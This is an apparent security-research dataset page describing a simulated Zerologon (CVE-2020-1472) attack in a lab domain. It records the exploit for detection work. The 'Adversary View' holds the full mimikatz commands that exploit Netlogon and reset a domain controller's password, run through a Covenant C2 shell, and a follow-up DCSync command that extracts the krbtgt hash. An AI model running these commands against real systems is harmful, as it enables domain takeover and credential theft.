Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2020/09/16

Modification Date

2020/09/16

Tactics

TA0008

Techniques

T1210

Tags

CVE-2020-1472,Password Update,Netlogon Insecure AES-CFB8

Dataset Description

This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This vulnerability was discovered by @@SecuraBV.

Simulation Metadata

Tools

type

Name

Module

C2

Covenant

ShellCmd

tool

mimikatz

lsadump

tool

SharpZeroLogon

SharpZeroLogon

Adversary View

Mimikatz Implementation (NetrServerAuthenticate2)
=================================================

(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\" exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/


mimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit

Target : MORDORDC.theshire.local
Account: MORDORDC$
Type   : 6 (Server)
Mode   : exploit

Trying to 'authenticate'...
====================================================

NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000

* Authentication: OK -- vulnerable
* Set password  : OK -- may be unstable

mimikatz(commandline) # exit

Bye!

DCSync Follow-up (Optional)
(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\"\\" /authntlm\" exit"

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)